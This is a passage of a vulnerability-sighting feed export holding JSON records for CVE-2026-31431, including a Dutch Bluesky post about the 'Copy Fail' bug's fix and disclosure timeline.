"Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"} {"uuid": "918e2870-5e1d-45ca-876a-34ec3976e654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"} https://vulnerability.circl.lu/sighting/918e2870-5e1d-45ca-876a-34ec3976e654/export Fri, 05 Jun 2026 09:00:04 +0000 https://vulnerability.circl.lu/sighting/56478d6d-f0df-4e77-985a-90d1f9f88bfd/export {"uuid": "56478d6d-f0df-4e77-985a-90d1f9f88bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stefketels.vrk.social/post/3mnkibm5dxcn3", "content": "Ik draai al te lang mee om mee spelen in religieuze OS-oorlogen, maar dat laatste statement vind ik zeer ver gaan. Ik neem aan dat u het over CVE-2026-31431 (\"Copy Fail\") heeft? Er was een mainline fix negen dagen na het rapport en 28 dagen voor de afgesproken public disclosure. /1", "creation_timestamp": "2026-06-05T15:46:12.346690Z"} {"uuid": "56478d6d-f0df-4e77-985a-90d1f9f88bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stefketels.vrk.social/post/3mnkibm5dxcn3", "content": "Ik draai al te lang mee om mee spelen in religieuze OS-oorlogen, maar dat laatste statement vind ik zeer ver gaan. Ik neem aan dat u het over CVE-2026-31431 (\"Copy Fail\") heeft? Er was een mainline fix negen dagen na het rapport en 28 dagen voor de afgesproken public disclosure. /1", "creation_timestamp": "2026-06-05T15:46:12.346690Z"} https://vulnerability.circl.lu/sighting/56478d6d-f0df-4e77-985a-90d1f9f88bfd/export Fri, 05 Jun 2026 15:46:12 +0000